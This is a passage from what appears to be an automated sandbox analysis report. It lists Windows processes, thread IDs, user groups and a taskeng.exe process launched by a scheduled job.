SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ba6f" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 255 os_tid = 0xb4c Thread: id = 256 os_tid = 0x658 Thread: id = 257 os_tid = 0x584 Thread: id = 258 os_tid = 0x728 Thread: id = 259 os_tid = 0x674 Thread: id = 260 os_tid = 0x65c Thread: id = 261 os_tid = 0x144 Thread: id = 262 os_tid = 0x118 Thread: id = 263 os_tid = 0x3ec Thread: id = 264 os_tid = 0x3e8 Thread: id = 265 os_tid = 0x3e0 Thread: id = 266 os_tid = 0x3dc Thread: id = 267 os_tid = 0x3cc Thread: id = 268 os_tid = 0x3c8 Thread: id = 269 os_tid = 0x388 Thread: id = 270 os_tid = 0x384 Thread: id = 271 os_tid = 0x380 Thread: id = 272 os_tid = 0x37c Thread: id = 273 os_tid = 0x364 Thread: id = 274 os_tid = 0x34c Thread: id = 275 os_tid = 0x338 Thread: id = 286 os_tid = 0x9b4 Process: id = "76" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x697e000" os_pid = "0x4b8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "created_scheduled_job" parent_id = "44" os_parent_pid = "0x9e0" cmd_line = "taskeng.exe {9EE706EE-394B-487B-BB34-8CF0ADE98102} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e2c5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 303 os_tid = 0x4bc Thread: id = 304 os_tid = 0x4c8 Thread: id = 305 os_tid = 0x4e4 Thread: id = 306 os_tid = 0x544 Thread: id = 307 os_tid = 0x560 Thread: id = 308 os_tid = 0x564 Thread: id = 309 os_tid = 0x5ac Thread: id = 310 os_tid = 0x688